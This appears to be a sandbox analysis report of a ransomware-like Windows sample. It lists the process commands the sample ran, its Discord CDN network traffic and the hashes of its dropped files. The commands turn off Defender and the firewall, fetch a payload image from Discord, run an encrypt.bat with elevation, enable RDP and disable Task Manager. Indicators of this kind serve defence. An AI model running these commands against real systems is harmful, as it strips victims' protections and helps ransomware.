C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 162.159.129.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI15682\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI15682\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI15682\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI15682\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI15682\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI15682\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI15682\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI15682\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI15682\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI15682\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

memory/3400-239-0x00007FFAC3423000-0x00007FFAC3425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgbq1awd.h2i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3400-248-0x0000029022080000-0x00000290220A2000-memory.dmp

memory/3400-249-0x00007FFAC3420000-0x00007FFAC3EE2000-memory.dmp

memory/3400-250-0x00007FFAC3420000-0x00007FFAC3EE2000-memory.dmp

memory/3400-251-0x00007FFAC3420000-0x00007FFAC3EE2000-memory.dmp

memory/3400-254-0x00007FFAC3420000-0x00007FFAC3EE2000-memory.dmp

memory/3400-255-0x00007FFAC3420000-0x00007FFAC3EE2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c705388d79c00418e5c1751159353e3
SHA1 aaeafebce5483626ef82813d286511c1f353f861
SHA256 697bd270be634688c48210bee7c5111d7897fd71a6af0bbb2141cefd2f8e4a4d
SHA512 c1614e79650ab9822c4e175ba528ea4efadc7a6313204e4e69b4a9bd06327fb92f56fba95f2595885b1604ca8d8f6b282ab542988995c674d89901da2bc4186f

C:\Encrypt\encrypt.bat

MD5 59094544993f4727a85d62f55ea66f17
SHA1 39a125f1d71b596e57d14c2865626b95825f1053
SHA256 9b70930727653b6b647554cf3bd508fe9ba4981aaebcbeed91f7270653d679ca
SHA512 48f15e70f9e800533e3869b527d4cae504ef04a2fea38c9aa1f2bb541fd1fa559979a6b7e802da067b52a98202387fd5b9023dfa09f85d67c8c7b759f73a4774

\??\pipe\LOCAL\crashpad_2620_WUURINXPYFVBCHRC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0d84d1490aa9f725b68407eab8f0030e
SHA1 83964574467b7422e160af34ef024d1821d6d1c3
SHA256 40c09bb0248add089873d1117aadefb46c1b4e23241ba4621f707312de9c829e
SHA512 f84552335ff96b5b4841ec26e222c24af79b6d0271d27ad05a9dfcee254a7b9e9019e7fac0def1245a74754fae81f7126499bf1001615073284052aaa949fa00

C:\Encrypt\encrypt.html

MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 275cb195ad945ed8e00a4fc39b28e3a6
SHA1 2ef4e5d4beebeeec92e5b9912ce0e40fa04856e8
SHA256 839ecba117d683e1d781fa09d3488d6d0d03f4b0db2579948ac9d1e573493038
SHA512 e5b9fba5c99c83f1672c9ef40f3cfc44ea860b91f1a456ff9dc102458c7e1f7c7a985aa3da0e4051624430e44040fac5dba4477b516f99eae14bac4ac88300fe

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4914eb0b2ff51bfa48484b5cc8454218
SHA1 6a7c3e36ce53b42497884d4c4a3bda438dd4374b
SHA256 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e
SHA512 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 36a6f0d525e437670a2ba4da246595c5
SHA1 506a306d596a034892d397c9850ef1cf50443afe
SHA256 ad28c7bfc5ac3b6df758d5cce9dc5b613dcb742ebd2892d3a4ca7eace80f68fe
SHA512 748158bdd3802c05659befc6a2cec8375c40c9b2bdc7c284d6209129b8b931ac62f90ed3433adc53c6869a96dd3e59d3c0a90043e8df94ac6e37176bc1b65c9d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e07eea85a8893f23fb814cf4b3ed974c
SHA1 8a8125b2890bbddbfc3531d0ee4393dbbf5936fe
SHA256 83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea
SHA512 9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5b705b4839f481b2485f2195c589cad0
SHA1 a55866cd9e6fedf352d0e937101755ea61a50c86
SHA256 f6a3b94a63de605bbbcf1e95cb2d743166f44ea7e9d0d2bfa0e88c94c26e37c6
SHA512 f228eccd5646068a81e79baeaf7e8bfa470b30d503bf0ca8cc746c009510ab609b5c091cadf08fab1e3581900cdb7834c775c61a95a29c2d73ccd0dcbd851bab

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f28832ecd9829ee81bb32f98f0747445
SHA1 ac0dc6c286da7b0b7b1b595aaf4f8877e1304125
SHA256 d44590cb55e999c1e0abdd9932e00ddde1bc637ac3eb7d02374ace88479f2f50
SHA512 3b72129f951df7d4b2437ed761ff00ea9dc046a284665a3036b9c86fd20626435f775ec2bb9665435b7d8ec6a211e6c54d1debae75b5ae8778797b3485a163fa

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f0e62045515b66d0a0105abc22dbf19
SHA1 894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512 f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 865c7514ce8150e41eb7f3cc65bbfc64
SHA1 1cafddfd18786928d53f87e9eaca4145a0480440
SHA256 ea3092d46ef2ce42a11593854ff911b727f23189c232f4891765801d8dca4f59
SHA512 ae79d53f14b2e51427453503e3289d2ce393832140e3d805ea180a65a241f5a8a2d8c33d05de63ebb0758dd5f6824806e9613a6736b45f38aed97de6090f9080

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe90bfa236d5b5af9a2c812258ca6369
SHA1 9860bcb8549d2a887b8ba45d81f505c90f8fcc9c
SHA256 24a62d6de07a95a0878221a47a99c7444f354e76ea77eabc25a876d3ad9af525
SHA512 7a9f638da24e7af98f332b78dcab8a0356497260792356ba75abd7be9a92add1b749e50cee31ddf06577dd32b8d5767c506b0f373acc674024e6078713161114

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9da8021147df431f0ef2227fd0f2de9
SHA1 93cedcd404e5565bdf90314bbd27bd263442a161
